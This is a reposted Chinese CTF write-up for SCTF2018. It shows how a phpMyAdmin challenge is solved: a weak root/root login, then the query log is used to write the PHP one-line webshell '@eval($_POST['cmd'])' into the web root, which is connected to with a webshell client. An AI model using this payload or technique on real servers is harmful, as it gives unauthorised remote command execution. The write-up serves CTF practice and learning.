Writeup | SCTF2018 |CTF 比赛 |By Jas502n

Posted jas502n

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Writeup | SCTF2018 |CTF 比赛 |By Jas502n相关的知识,希望对你有一定的参考价值。

__________WEB_____________

0x01 easiest web – phpMyAdmin

Ps: 思路弱口令(root / root)登陆phpmyadmin,利用日志功能进行getshell

送分题,轻松一下

http://47.97.214.247:20001/phpmyadmin

Alternate address:

http://218.245.4.98:20000/phpmyadmin

技术分享图片

 

开启日志,写入一句话

 

技术分享图片

查询sql语句

<?php @eval($_POST[‘cmd‘]);?>

日志写入到网站路径下的dasdasdas.php文件

然后就getshell

技术分享图片

http://218.245.4.98:20000/dasdasdad.php

密码:cmd

菜刀连接

技术分享图片

 

在C盘发现flag

技术分享图片

sctf{31cf2213cc49605a30f07395d6e5b9c4}

 

0x02  新的建议板

 

以上是关于Writeup | SCTF2018 |CTF 比赛 |By Jas502n的主要内容,如果未能解决你的问题,请参考以下文章

TCTF/0CTF2018 XSS Writeup

实验吧CTF密码学Writeup-疑惑的汉字Writeup

SCTF的一个WP------modbus

实验吧CTF密码学Writeup-奇妙的音乐Writeup

ctf题目writeup

RCTF 2018线上赛 writeup